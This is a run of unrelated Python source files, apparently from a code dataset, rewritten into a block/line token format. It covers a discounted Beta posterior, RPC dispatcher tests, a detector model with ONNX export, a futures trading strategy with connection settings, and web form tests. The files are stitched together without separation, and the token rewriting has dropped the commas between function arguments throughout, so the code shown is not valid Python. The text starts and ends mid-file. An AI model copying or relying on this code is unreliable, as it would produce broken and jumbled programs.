call btdtri with (0.5,0.5,0.5) in scipy version < 0.9 (old) <block_end><def_stmt>forget self obs<block_start>"""Forget the last observation, and undiscount the count of observations."""<line_sep># print("Info: calling DiscountedBeta.forget() with obs = {}, self.N = {} and self.gamma = {} ...".format(obs, self.N, self.gamma)) # DEBUG # FIXED update this code, to accept obs that are FLOAT in [0, 1] and not just in {0, 1}... binaryObs=bernoulliBinarization(obs)<line_sep>self.N[binaryObs]=(self.N[binaryObs]-1)/self.gamma<line_sep>otherObs=1-binaryObs<line_sep>self.N[otherObs]=self.N[otherObs]/self.gamma<block_end><def_stmt>update self obs<block_start>r""" Add an observation, and discount the previous observations. - If obs is 1, update :math:`\alpha` the count of positive observations, - If it is 0, update :math:`\beta` the count of negative observations. - But instead of using :math:`\tilde{S}(t) = S(t)` and :math:`\tilde{N}(t) = N(t)`, they are updated at each time step using the discount factor :math:`\gamma`: .. math:: \tilde{S}(t+1) &= \gamma \tilde{S}(t) + r(t), \tilde{F}(t+1) &= \gamma \tilde{F}(t) + (1 - r(t)). .. note:: Otherwise, a trick with :func:`bernoulliBinarization` has to be used. """<line_sep># print("Info: calling DiscountedBeta.update() with obs = {}, self.N = {} and self.gamma = {} ...".format(obs, self.N, self.gamma)) # DEBUG # FIXED update this code, to accept obs that are FLOAT in [0, 1] and not just in {0, 1}... binaryObs=bernoulliBinarization(obs)<line_sep>self.N[binaryObs]=self.gamma<times>self.N[binaryObs]+1<line_sep>otherObs=1-binaryObs<line_sep>self.N[otherObs]=self.gamma<times>self.N[otherObs]<block_end><def_stmt>discount self<block_start>r""" Simply discount the old observation, when no observation is given at this time. .. math:: \tilde{S}(t+1) &= \gamma \tilde{S}(t), \tilde{F}(t+1) &= \gamma \tilde{F}(t). """<line_sep># print("Info: calling DiscountedBeta.discount() self.N = {} and self.gamma = {} ...".format(self.N, self.gamma)) # DEBUG self.N[0]=max(0 self.gamma<times>self.N[0])<line_sep>self.N[1]=max(0 self.gamma<times>self.N[1])<block_end><def_stmt>undiscount self<block_start>r""" Simply cancel the discount on the old observation, when no observation is given at this time. .. math:: \tilde{S}(t+1) &= \frac{1}{\gamma} \tilde{S}(t), \tilde{F}(t+1) &= \frac{1}{\gamma} \tilde{F}(t). """<line_sep># print("Info: calling DiscountedBeta.undiscount() self.N = {} and self.gamma = {} ...".format(self.N, self.gamma)) # DEBUG self.N[0]=max(0 self.N[0]/self.gamma)<line_sep>self.N[1]=max(0 self.N[1]/self.gamma)<block_end><block_end>
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. <import_stmt>socket<import_from_stmt>maro.communication Proxy<def_stmt>get_random_port <block_start><with_stmt>socket.socket(socket.AF_INET socket.SOCK_STREAM)<as>temp_socket<block_start>temp_socket.bind(("" 0))<line_sep>random_port=temp_socket.getsockname()[1]<block_end><return>random_port<block_end><def_stmt>proxy_generator component_type redis_port<block_start>proxy_parameters={"group_name":"communication_unit_test" "redis_address":("localhost" redis_port) "log_enable":<false>}<line_sep>component_type_expected_peers_map={"receiver":{"sender":1} "sender":{"receiver":1} "master":{"worker":5} "worker":{"master":1}}<line_sep>proxy=Proxy(component_type=component_type expected_peers=component_type_expected_peers_map[component_type] **proxy_parameters)<line_sep><return>proxy<block_end>
<import_from_stmt>typing List<import_from_stmt>pydantic BaseModel<class_stmt>Data(BaseModel)<block_start>data:List[List[float]]=[[5.1 3.5 1.4 0.2]]<block_end>
# Copyright 2013 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_stmt>testscenarios<import_stmt>time<import_stmt>oslo_messaging<import_from_stmt>oslo_messaging rpc<import_from_stmt>oslo_messaging serializer<as>msg_serializer<import_from_stmt>oslo_messaging.tests utils<as>test_utils<import_from_stmt>unittest mock<line_sep>load_tests=testscenarios.load_tests_apply_scenarios<class_stmt>_FakeEndpoint(object)<block_start><def_stmt>__init__ self target=<none><block_start>self.target=target<block_end><def_stmt>foo self ctxt **kwargs<block_start><pass><block_end>@rpc.expose<def_stmt>bar self ctxt **kwargs<block_start><pass><block_end><def_stmt>_foobar self ctxt **kwargs<block_start><pass><block_end><block_end><class_stmt>TestDispatcher(test_utils.BaseTestCase)<block_start>scenarios=[('no_endpoints' dict(endpoints=[] access_policy=<none> dispatch_to=<none> ctxt={} msg=dict(method='foo') exposed_methods=['foo' 'bar' '_foobar'] success=<false> ex=oslo_messaging.UnsupportedVersion)) ('default_target' dict(endpoints=[{}] access_policy=<none> dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo') exposed_methods=['foo' 'bar' '_foobar'] success=<true> ex=<none>)) ('default_target_ctxt_and_args' dict(endpoints=[{}] access_policy=oslo_messaging.LegacyRPCAccessPolicy dispatch_to=dict(endpoint=0 method='bar') ctxt=dict(user='bob') msg=dict(method='bar' args=dict(blaa=<true>)) exposed_methods=['foo' 'bar' '_foobar'] success=<true> ex=<none>)) ('default_target_namespace' dict(endpoints=[{}] access_policy=oslo_messaging.LegacyRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' namespace=<none>) exposed_methods=['foo' 'bar' '_foobar'] success=<true> ex=<none>)) ('default_target_version' dict(endpoints=[{}] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' version='1.0') exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('default_target_no_such_method' dict(endpoints=[{}] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=<none> ctxt={} msg=dict(method='foobar') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.NoSuchMethod)) ('namespace' dict(endpoints=[{} dict(namespace='testns')] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=1 method='foo') ctxt={} msg=dict(method='foo' namespace='testns') exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('namespace_mismatch' dict(endpoints=[{} dict(namespace='testns')] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=<none> ctxt={} msg=dict(method='foo' namespace='nstest') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.UnsupportedVersion)) ('version' dict(endpoints=[dict(version='1.5') dict(version='3.4')] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=1 method='foo') ctxt={} msg=dict(method='foo' version='3.2') exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('version_mismatch' dict(endpoints=[dict(version='1.5') dict(version='3.0')] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=<none> ctxt={} msg=dict(method='foo' version='3.2') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.UnsupportedVersion)) ('message_in_null_namespace_with_multiple_namespaces' dict(endpoints=[dict(namespace='testns' legacy_namespaces=[<none>])] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' namespace=<none>) exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('message_in_wrong_namespace_with_multiple_namespaces' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>])] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=<none> ctxt={} msg=dict(method='foo' namespace='wrong') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.UnsupportedVersion)) ('message_with_endpoint_no_private_and_public_method' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>])] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' namespace='testns') exposed_methods=['foo' 'bar'] success=<true> ex=<none>)) ('message_with_endpoint_no_private_and_private_method' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>] )] access_policy=oslo_messaging.DefaultRPCAccessPolicy dispatch_to=dict(endpoint=0 method='_foobar') ctxt={} msg=dict(method='_foobar' namespace='testns') exposed_methods=['foo' 'bar'] success=<false> ex=oslo_messaging.NoSuchMethod)) ('message_with_endpoint_explicitly_exposed_without_exposed_method' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>] )] access_policy=oslo_messaging.ExplicitRPCAccessPolicy dispatch_to=dict(endpoint=0 method='foo') ctxt={} msg=dict(method='foo' namespace='testns') exposed_methods=['bar'] success=<false> ex=oslo_messaging.NoSuchMethod)) ('message_with_endpoint_explicitly_exposed_with_exposed_method' dict(endpoints=[dict(namespace='testns' legacy_namespaces=['second' <none>] )] access_policy=oslo_messaging.ExplicitRPCAccessPolicy dispatch_to=dict(endpoint=0 method='bar') ctxt={} msg=dict(method='bar' namespace='testns') exposed_methods=['bar'] success=<true> ex=<none>)) ]<def_stmt>test_dispatcher self<block_start><def_stmt>_set_endpoint_mock_properties endpoint<block_start>endpoint.foo=mock.Mock(spec=dir(_FakeEndpoint.foo))<line_sep># mock doesn't pick up the decorated method. endpoint.bar=mock.Mock(spec=dir(_FakeEndpoint.bar))<line_sep>endpoint.bar.exposed=mock.PropertyMock(return_value=<true>)<line_sep>endpoint._foobar=mock.Mock(spec=dir(_FakeEndpoint._foobar))<line_sep><return>endpoint<block_end>endpoints=[_set_endpoint_mock_properties(mock.Mock(spec=_FakeEndpoint target=oslo_messaging.Target(**e)))<for>e self.endpoints]<line_sep>serializer=<none><line_sep>dispatcher=oslo_messaging.RPCDispatcher(endpoints serializer self.access_policy)<line_sep>incoming=mock.Mock(ctxt=self.ctxt message=self.msg client_timeout=0)<line_sep>res=<none><try_stmt><block_start>res=dispatcher.dispatch(incoming)<block_end><except_stmt>Exception<as>ex<block_start>self.assertFalse(self.success ex)<line_sep>self.assertIsNotNone(self.ex ex)<line_sep>self.assertIsInstance(ex self.ex ex)<if_stmt>isinstance(ex oslo_messaging.NoSuchMethod)<block_start>self.assertEqual(self.msg.get('method') ex.method)<block_end><elif_stmt>isinstance(ex oslo_messaging.UnsupportedVersion)<block_start>self.assertEqual(self.msg.get('version' '1.0') ex.version)<if_stmt>ex.method<block_start>self.assertEqual(self.msg.get('method') ex.method)<block_end><block_end><block_end><else_stmt><block_start>self.assertTrue(self.success "Unexpected success of operation during testing")<line_sep>self.assertIsNotNone(res)<block_end><for_stmt>n,endpoint enumerate(endpoints)<block_start><for_stmt>method_name self.exposed_methods<block_start>method=getattr(endpoint method_name)<if_stmt>self.dispatch_to<and>n<eq>self.dispatch_to['endpoint']<and>method_name<eq>self.dispatch_to['method']<and>method_name<in>self.exposed_methods<block_start>method.assert_called_once_with(self.ctxt **self.msg.get('args' {}))<block_end><else_stmt><block_start>self.assertEqual(0 method.call_count 'method: {}'.format(method))<block_end><block_end><block_end><block_end><block_end><class_stmt>TestDispatcherWithPingEndpoint(test_utils.BaseTestCase)<block_start><def_stmt>test_dispatcher_with_ping self<block_start>self.config(rpc_ping_enabled=<true>)<line_sep>dispatcher=oslo_messaging.RPCDispatcher([] <none> <none>)<line_sep>incoming=mock.Mock(ctxt={} message=dict(method='oslo_rpc_server_ping') client_timeout=0)<line_sep>res=dispatcher.dispatch(incoming)<line_sep>self.assertEqual('pong' res)<block_end><def_stmt>test_dispatcher_with_ping_already_used self<block_start><class_stmt>MockEndpoint(object)<block_start><def_stmt>oslo_rpc_server_ping self ctxt **kwargs<block_start><return>'not_pong'<block_end><block_end>mockEndpoint=MockEndpoint()<line_sep>self.config(rpc_ping_enabled=<true>)<line_sep>dispatcher=oslo_messaging.RPCDispatcher([mockEndpoint] <none> <none>)<line_sep>incoming=mock.Mock(ctxt={} message=dict(method='oslo_rpc_server_ping') client_timeout=0)<line_sep>res=dispatcher.dispatch(incoming)<line_sep>self.assertEqual('not_pong' res)<block_end><block_end><class_stmt>TestSerializer(test_utils.BaseTestCase)<block_start>scenarios=[('no_args_or_retval' dict(ctxt={} dctxt={} args={} retval=<none>)) ('args_and_retval' dict(ctxt=dict(user='bob') dctxt=dict(user='alice') args=dict(a='a' b='b' c='c') retval='d')) ]<def_stmt>test_serializer self<block_start>endpoint=_FakeEndpoint()<line_sep>serializer=msg_serializer.NoOpSerializer()<line_sep>dispatcher=oslo_messaging.RPCDispatcher([endpoint] serializer)<line_sep>endpoint.foo=mock.Mock()<line_sep>args=dict([(k 'd'+v)<for>k,v self.args.items()])<line_sep>endpoint.foo.return_value=self.retval<line_sep>serializer.serialize_entity=mock.Mock()<line_sep>serializer.deserialize_entity=mock.Mock()<line_sep>serializer.deserialize_context=mock.Mock()<line_sep>serializer.deserialize_context.return_value=self.dctxt<line_sep>expected_side_effect=['d'+arg<for>arg self.args]<line_sep>serializer.deserialize_entity.side_effect=expected_side_effect<line_sep>serializer.serialize_entity.return_value=<none><if_stmt>self.retval<block_start>serializer.serialize_entity.return_value='s'+self.retval<block_end>incoming=mock.Mock()<line_sep>incoming.ctxt=self.ctxt<line_sep>incoming.message=dict(method='foo' args=self.args)<line_sep>incoming.client_timeout=0<line_sep>retval=dispatcher.dispatch(incoming)<if_stmt>self.retval<is><not><none><block_start>self.assertEqual('s'+self.retval retval)<block_end>endpoint.foo.assert_called_once_with(self.dctxt **args)<line_sep>serializer.deserialize_context.assert_called_once_with(self.ctxt)<line_sep>expected_calls=[mock.call(self.dctxt arg)<for>arg self.args]<line_sep>self.assertEqual(expected_calls serializer.deserialize_entity.mock_calls)<line_sep>serializer.serialize_entity.assert_called_once_with(self.dctxt self.retval)<block_end><block_end><class_stmt>TestMonitorFailure(test_utils.BaseTestCase)<block_start>"""Test what happens when the call monitor watchdog hits an exception when sending the heartbeat. """<class_stmt>_SleepyEndpoint(object)<block_start><def_stmt>__init__ self target=<none><block_start>self.target=target<block_end><def_stmt>sleep self ctxt **kwargs<block_start>time.sleep(kwargs['timeout'])<line_sep><return><true><block_end><block_end><def_stmt>test_heartbeat_failure self<block_start>endpoints=[self._SleepyEndpoint()]<line_sep>dispatcher=oslo_messaging.RPCDispatcher(endpoints serializer=<none>)<line_sep># sleep long enough for the client_timeout to expire multiple times # the timeout is (client_timeout/2) and must be > 1.0 message={'method':'sleep' 'args':{'timeout':3.5}}<line_sep>ctxt={'test':'value'}<line_sep>incoming=mock.Mock(ctxt=ctxt message=message client_timeout=2.0)<line_sep>incoming.heartbeat=mock.Mock(side_effect=Exception('BOOM!'))<line_sep>res=dispatcher.dispatch(incoming)<line_sep>self.assertTrue(res)<line_sep># only one call to heartbeat should be made since the watchdog thread # should exit on the first exception thrown self.assertEqual(1 incoming.heartbeat.call_count)<block_end><block_end>
<import_from_stmt>distutils.core setup<line_sep>setup(name='frozendict' version='0.3' url='https://github.com/slezica/python-frozendict' author='<NAME>' author_email='<EMAIL>' packages=['frozendict'] license='MIT License' description='An immutable dictionary' long_description=open('README.txt').read())<line_sep>
""" Loop. The loop() function causes draw() to execute repeatedly. If noLoop is called in setup() the draw() is only executed once. In this example click the mouse to execute loop(), which will cause the draw() to execute repeatedly. """<line_sep>y=100<def_stmt>setup <block_start>""" The statements in the setup() function run once when the program begins. """<line_sep>size(640 360)# Size should be the first statement stroke(255)# Set stroke color to white noLoop()<line_sep>y=height<times>0.5<block_end><def_stmt>draw <block_start>""" The statements in draw() are run until the program is stopped. Each statement is run in sequence and after the last line is read, the first line is run again. """<line_sep><global>y<line_sep>background(0)# Set the background to black line(0 y width y)<line_sep>y=y-1<if_stmt>y<l>0<block_start>y=height<block_end><block_end><def_stmt>mousePressed <block_start>loop()<block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>model.fpn *<import_from_stmt>model.backbone.shufflenetv2 *<class_stmt>Detector(nn.Module)<block_start><def_stmt>__init__ self classes anchor_num load_param<block_start>super(Detector self).__init__()<line_sep>out_depth=112<line_sep>stage_out_channels=[-1 24 48 96 192]<line_sep>self.backbone=ShuffleNetV2(stage_out_channels load_param)<line_sep>self.fpn=LightFPN(stage_out_channels[-2]+stage_out_channels[-1] stage_out_channels[-1] out_depth)<line_sep>self.output_layers=nn.Conv2d(out_depth (5+classes)<times>3 1 1 0 bias=<true>)<block_end><def_stmt>forward self x<block_start>C2,C3=self.backbone(x)<line_sep>P2,P3=self.fpn(C2 C3)<line_sep>out_2=self.output_layers(P2)<line_sep>out_3=self.output_layers(P3)<line_sep><return>out_2 out_3<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>model=Detector(80 3)<line_sep>test_data=torch.rand(1 3 320 320)<line_sep>torch.onnx.export(model #model being run test_data # model input (or a tuple for multiple inputs) "test.onnx" # where to save the model (can be a file or file-like object) export_params=<true> # store the trained parameter weights inside the model file opset_version=11 # the ONNX version to export the model to do_constant_folding=<true>)<block_end># whether to execute constant folding for optimization
<import_stmt>os<import_stmt>unittest<import_stmt>yaml<import_from_stmt>aws_lambda.helpers read<class_stmt>TestReadHelper(unittest.TestCase)<block_start>TEST_FILE="readTmp.txt"<def_stmt>setUp self<block_start><with_stmt>open(TestReadHelper.TEST_FILE "w")<as>tmp_file<block_start>tmp_file.write("testYaml: testing")<block_end><block_end><def_stmt>tearDown self<block_start>os.remove(TestReadHelper.TEST_FILE)<block_end><def_stmt>test_read_no_loader_non_binary self<block_start>fileContents=read(TestReadHelper.TEST_FILE)<line_sep>self.assertEqual(fileContents "testYaml: testing")<block_end><def_stmt>test_read_yaml_loader_non_binary self<block_start>testYaml=read(TestReadHelper.TEST_FILE loader=yaml.full_load)<line_sep>self.assertEqual(testYaml["testYaml"] "testing")<block_end><def_stmt>test_read_no_loader_binary_mode self<block_start>fileContents=read(TestReadHelper.TEST_FILE binary_file=<true>)<line_sep>self.assertEqual(fileContents b"testYaml: testing")<block_end><def_stmt>test_read_yaml_loader_binary_mode self<block_start>testYaml=read(TestReadHelper.TEST_FILE loader=yaml.full_load binary_file=<true>)<line_sep>self.assertEqual(testYaml["testYaml"] "testing")<block_end><block_end>
<import_stmt>unittest<import_stmt>os<import_stmt>tempfile<import_stmt>uuid<import_from_stmt>studio model<import_from_stmt>model_test get_test_experiment<line_sep># We are not currently working with HTTP providers. @unittest.skip<class_stmt>HTTPProviderHostedTest(unittest.TestCase)<block_start><def_stmt>get_db_provider self config_name<block_start>config_file=os.path.join(os.path.dirname(os.path.realpath(__file__)) config_name)<line_sep><return>model.get_db_provider(model.get_config(config_file))<block_end><def_stmt>test_add_get_delete_experiment self<block_start><with_stmt>self.get_db_provider('test_config_http_client.yaml')<as>hp<block_start>experiment_tuple=get_test_experiment()<line_sep>hp.add_experiment(experiment_tuple[0])<line_sep>experiment=hp.get_experiment(experiment_tuple[0].key)<line_sep>self.assertEquals(experiment.key experiment_tuple[0].key)<line_sep>self.assertEquals(experiment.filename experiment_tuple[0].filename)<line_sep>self.assertEquals(experiment.args experiment_tuple[0].args)<line_sep>hp.delete_experiment(experiment_tuple[1])<line_sep>self.assertTrue(hp.get_experiment(experiment_tuple[1])<is><none>)<block_end><block_end><def_stmt>test_start_experiment self<block_start><with_stmt>self.get_db_provider('test_config_http_client.yaml')<as>hp<block_start>experiment_tuple=get_test_experiment()<line_sep>hp.add_experiment(experiment_tuple[0])<line_sep>hp.start_experiment(experiment_tuple[0])<line_sep>experiment=hp.get_experiment(experiment_tuple[1])<line_sep>self.assertTrue(experiment.status<eq>'running')<line_sep>self.assertEquals(experiment.key experiment_tuple[0].key)<line_sep>self.assertEquals(experiment.filename experiment_tuple[0].filename)<line_sep>self.assertEquals(experiment.args experiment_tuple[0].args)<line_sep>hp.finish_experiment(experiment_tuple[0])<line_sep>hp.delete_experiment(experiment_tuple[1])<block_end><block_end><def_stmt>test_add_get_experiment_artifacts self<block_start>experiment_tuple=get_test_experiment()<line_sep>e_experiment=experiment_tuple[0]<line_sep>e_artifacts=e_experiment.artifacts<line_sep>a1_filename=os.path.join(tempfile.gettempdir() str(uuid.uuid4()))<line_sep>a2_filename=os.path.join(tempfile.gettempdir() str(uuid.uuid4()))<with_stmt>open(a1_filename 'w')<as>f<block_start>f.write('hello world')<block_end>e_artifacts['a1']={'local':a1_filename 'mutable':<false>}<line_sep>e_artifacts['a2']={'local':a2_filename 'mutable':<true>}<with_stmt>self.get_db_provider('test_config_http_client.yaml')<as>db<block_start>db.add_experiment(e_experiment)<line_sep>experiment=db.get_experiment(e_experiment.key)<line_sep>self.assertEquals(experiment.key e_experiment.key)<line_sep>self.assertEquals(experiment.filename e_experiment.filename)<line_sep>self.assertEquals(experiment.args e_experiment.args)<line_sep>db.delete_experiment(e_experiment.key)<line_sep>os.remove(a1_filename)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_stmt>torch<import_stmt>dist_chamfer<as>ext<line_sep>distChamfer=ext.chamferDist()<import_from_stmt>torch.autograd Variable<def_stmt>pairwise_dist x y<block_start>xx,yy,zz=torch.mm(x x.t()) torch.mm(y y.t()) torch.mm(x y.t())<line_sep>rx=xx.diag().unsqueeze(0).expand_as(xx)<line_sep>ry=yy.diag().unsqueeze(0).expand_as(yy)<line_sep>P=rx.t()+ry-2<times>zz<line_sep><return>P<block_end><def_stmt>NN_loss x y dim=0<block_start>dist=pairwise_dist(x y)<line_sep>values,indices=dist.min(dim=dim)<line_sep><return>values.mean()<block_end><def_stmt>mydistChamfer a b<block_start>x,y=a b<line_sep>bs,num_points,points_dim=x.size()<line_sep>xx=torch.bmm(x x.transpose(2 1))<line_sep>yy=torch.bmm(y y.transpose(2 1))<line_sep>zz=torch.bmm(x y.transpose(2 1))<line_sep>diag_ind=torch.arange(0 num_points).type(torch.cuda.LongTensor)<line_sep>rx=xx[: diag_ind diag_ind].unsqueeze(1).expand_as(xx)<line_sep>ry=yy[: diag_ind diag_ind].unsqueeze(1).expand_as(yy)<line_sep>P=rx.transpose(2 1)+ry-2<times>zz<line_sep><return>torch.min(P 2)[0] torch.min(P 1)[0]<block_end><def_stmt>test_chamfer <block_start>distChamfer=ext.chamferDist()<line_sep>p1=torch.rand(4 100 3).cuda()<line_sep>p2=torch.rand(4 100 3).cuda()<line_sep>points1=Variable(p1 requires_grad=<true>)<line_sep>points2=Variable(p2)<line_sep>dist1,dist2,=distChamfer(points1 points2)<line_sep>loss=torch.sum(dist1)<line_sep>print(loss)<line_sep>loss.backward()<line_sep>print(points1.grad points2.grad)<line_sep>mydist1,mydist2=mydistChamfer(points1 points2)<line_sep>d1=(dist1-mydist1)<power>2<line_sep>d2=(dist2-mydist2)<power>2<line_sep>print(d1 d2)<assert_stmt>(torch.sum(d1)+torch.sum(d2)<l>0.00000001) "chamfer cuda and chamfer normal are not giving the same results"<block_end>test_chamfer()<line_sep>
<import_from_stmt>ctpbee CtpbeeApi CtpBee<import_from_stmt>ctpbee.constant Offset TradeData Direction<import_from_stmt>ctpbee.indicator.ta_lib ArrayManager<class_stmt>DoubleMaStrategy(CtpbeeApi)<block_start><def_stmt>__init__ self name<block_start>super().__init__(name)<line_sep>self.manager=ArrayManager(100)<line_sep>self.instrument_set=["rb2101.SHFE"]# 这个里面的变量 如果你开启了行情分离选项, 当数据进来的时候会判断数据 只会把相应的行情送进来, 还要就是可以通过来订阅指定行情 self.buy=0<line_sep>self.sell=0<line_sep>self.slow=60<line_sep>self.fast=30<block_end><def_stmt>on_trade self trade:TradeData<block_start><if_stmt>trade.offset<eq>Offset.OPEN<block_start><if_stmt>trade.direction<eq>Direction.LONG<block_start>self.buy<augadd>trade.volume<block_end><else_stmt><block_start>self.sell<augadd>trade.volume<block_end><block_end><else_stmt><block_start><if_stmt>trade.direction<eq>Direction.LONG<block_start>self.sell<augsub>trade.volume<block_end><else_stmt><block_start>self.buy<augsub>trade.volume<block_end><block_end><block_end><def_stmt>on_bar self bar<block_start>""" """<line_sep>self.manager.add_data(bar)<if_stmt><not>self.manager.inited<block_start><return><block_end>fast_avg=self.manager.sma(self.fast array=<true>)<line_sep>slow_avg=self.manager.sma(self.slow array=<true>)<if_stmt>slow_avg[-2]<l>fast_avg[-2]<and>slow_avg[-1]<ge>fast_avg[-1]<block_start>self.action.cover(bar.close_price self.buy bar)<line_sep>self.action.sell(bar.close_price 3 bar)<block_end><if_stmt>fast_avg[-2]<l>slow_avg[-2]<and>fast_avg[-1]<ge>slow_avg[-1]<block_start>self.action.sell(bar.close_price self.sell bar)<line_sep>self.action.buy(bar.close_price 3 bar)<block_end><block_end><def_stmt>on_tick self tick<block_start><pass><block_end><def_stmt>on_init self init:bool<block_start>print("初始化成功了, 这里可能会触发两次哦")<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>app=CtpBee("doublema" __name__ refresh=<true>)<line_sep>app.config.from_mapping({"CONNECT_INFO":{"userid":"089131" "password":"<PASSWORD>" "brokerid":"9999" "md_address":"tcp://172.16.17.32:10112" "td_address":"tcp://172.16.17.32:10102" "product_info":"" "appid":"simnow_client_test" "auth_code":"0000000000000000"} "INTERFACE":"ctp" # 接口声明 "TD_FUNC":<true> # 开启交易功能 "MD_FUNC":<true> "XMIN":[1]})<line_sep>strategy=DoubleMaStrategy("doublema")<line_sep>app.add_extension(strategy)<line_sep>app.start()<block_end>
<import_stmt>cgi<import_stmt>os.path<import_stmt>struct<import_stmt>sys<import_stmt>webtest<import_from_stmt>webob Request<import_from_stmt>webtest.debugapp DebugApp<import_from_stmt>webtest.compat to_bytes<import_from_stmt>webtest.forms NoValue Submit Upload<import_from_stmt>tests.compat unittest<import_from_stmt>tests.compat u<class_stmt>TestForms(unittest.TestCase)<block_start><def_stmt>callFUT self filename='form_inputs.html' formid='simple_form'<block_start>dirname=os.path.join(os.path.dirname(__file__) 'html')<line_sep>app=DebugApp(form=os.path.join(dirname filename) show_form=<true>)<line_sep>resp=webtest.TestApp(app).get('/form.html')<line_sep><return>resp.forms[formid]<block_end><def_stmt>test_set_submit_field self<block_start>form=self.callFUT()<line_sep>self.assertRaises(AttributeError form['submit'].value__set 'foo')<block_end><def_stmt>test_button self<block_start>form=self.callFUT()<line_sep>button=form['button']<line_sep>self.assertTrue(isinstance(button Submit) "<button> without type is a submit button")<block_end><def_stmt>test_button_value_if_submitted self<block_start>form=self.callFUT()<line_sep>submit=form['submit']<line_sep>self.assertEqual(submit.value_if_submitted() '' "submit default value is ''")<line_sep>button=form['button']<line_sep>self.assertEqual(button.value_if_submitted() '' "submit default value is ''")<block_end><def_stmt>test_force_select self<block_start>form=self.callFUT()<line_sep>form['select'].force_value('notavalue')<line_sep>form['select'].value__set('value3')<line_sep>self.assertTrue(form['select']._forced_value<is>NoValue "Setting a value after having forced a value should keep a forced"<concat>" state")<line_sep>self.assertEqual(form['select'].value 'value3' "the value should the the one set by value__set")<line_sep>self.assertEqual(form['select'].selectedIndex 2 "the value index should be the one set by value__set")<block_end><def_stmt>test_form_select self<block_start>form=self.callFUT()<line_sep>form.select('select' 'value1')<line_sep>self.assertEqual(form['select'].value 'value1' "when using form.select, the input selected value should be "<concat>"changed")<block_end><def_stmt>test_get_field_by_index self<block_start>form=self.callFUT()<line_sep>self.assertEqual(form['select'] form.get('select' index=0))<block_end><def_stmt>test_get_unknown_field self<block_start>form=self.callFUT()<line_sep>self.assertEqual(form['unknown'].value '')<line_sep>form['unknown'].value='1'<line_sep>self.assertEqual(form['unknown'].value '1')<block_end><def_stmt>test_get_non_exist_fields self<block_start>form=self.callFUT()<line_sep>self.assertRaises(AssertionError form.get 'nonfield')<block_end><def_stmt>test_get_non_exist_fields_with_default self<block_start>form=self.callFUT()<line_sep>value=form.get('nonfield' default=1)<line_sep>self.assertEqual(value 1)<block_end><def_stmt>test_upload_fields self<block_start>form=self.callFUT()<line_sep>fu=webtest.Upload(__file__)<line_sep>form['file']=fu<line_sep>self.assertEqual(form.upload_fields() [['file' __file__]])<block_end><def_stmt>test_repr self<block_start>form=self.callFUT()<line_sep>self.assertTrue(repr(form).startswith('<Form id='))<block_end><def_stmt>test_the_bs_node_must_not_change self<block_start>form=self.callFUT()<line_sep>self.assertEqual(form.text str(form.html))<block_end><def_stmt>test_set_multiple_checkboxes self<block_start>form=self.callFUT(formid='multiple_checkbox_form')<line_sep>form['checkbox']=[10 30]<line_sep>self.assertEqual(form.get('checkbox' index=0).value '10')<line_sep>self.assertEqual(form.get('checkbox' index=1).value <none>)<line_sep>self.assertEqual(form.get('checkbox' index=2).value '30')<block_end><def_stmt>test_button_submit self<block_start>form=self.callFUT(formid='multiple_buttons_form')<line_sep>display=form.submit('action')<line_sep>self.assertIn(u("action=deactivate") display display)<block_end><def_stmt>test_button_submit_by_index self<block_start>form=self.callFUT(formid='multiple_buttons_form')<line_sep>display=form.submit('action' index=1)<line_sep>self.assertIn(u("action=activate") display display)<block_end><def_stmt>test_button_submit_by_value self<block_start>form=self.callFUT(formid='multiple_buttons_form')<line_sep>display=form.submit('action' value='activate')<line_sep>self.assertIn(u("action=activate") display display)<block_end><def_stmt>test_button_submit_by_value_and_index self<block_start>form=self.callFUT(formid='multiple_buttons_form')<line_sep>self.assertRaises(ValueError form.submit "action" value="activate" index=0)<block_end><block_end><class_stmt>TestResponseFormAttribute(unittest.TestCase)<block_start><def_stmt>callFUT self body<block_start>app=DebugApp(form=to_bytes(body))<line_sep><return>webtest.TestApp(app)<block_end><def_stmt>test_no_form self<block_start>app=self.callFUT('<html><body></body></html>')<line_sep>res=app.get('/form.html')<line_sep>self.assertRaises(TypeError <lambda>:res.form)<block_end><def_stmt>test_too_many_forms self<block_start>app=self.callFUT('<html><body><form></form><form></form></body></html>')<line_sep>res=app.get('/form.html')<line_sep>self.assertRaises(TypeError 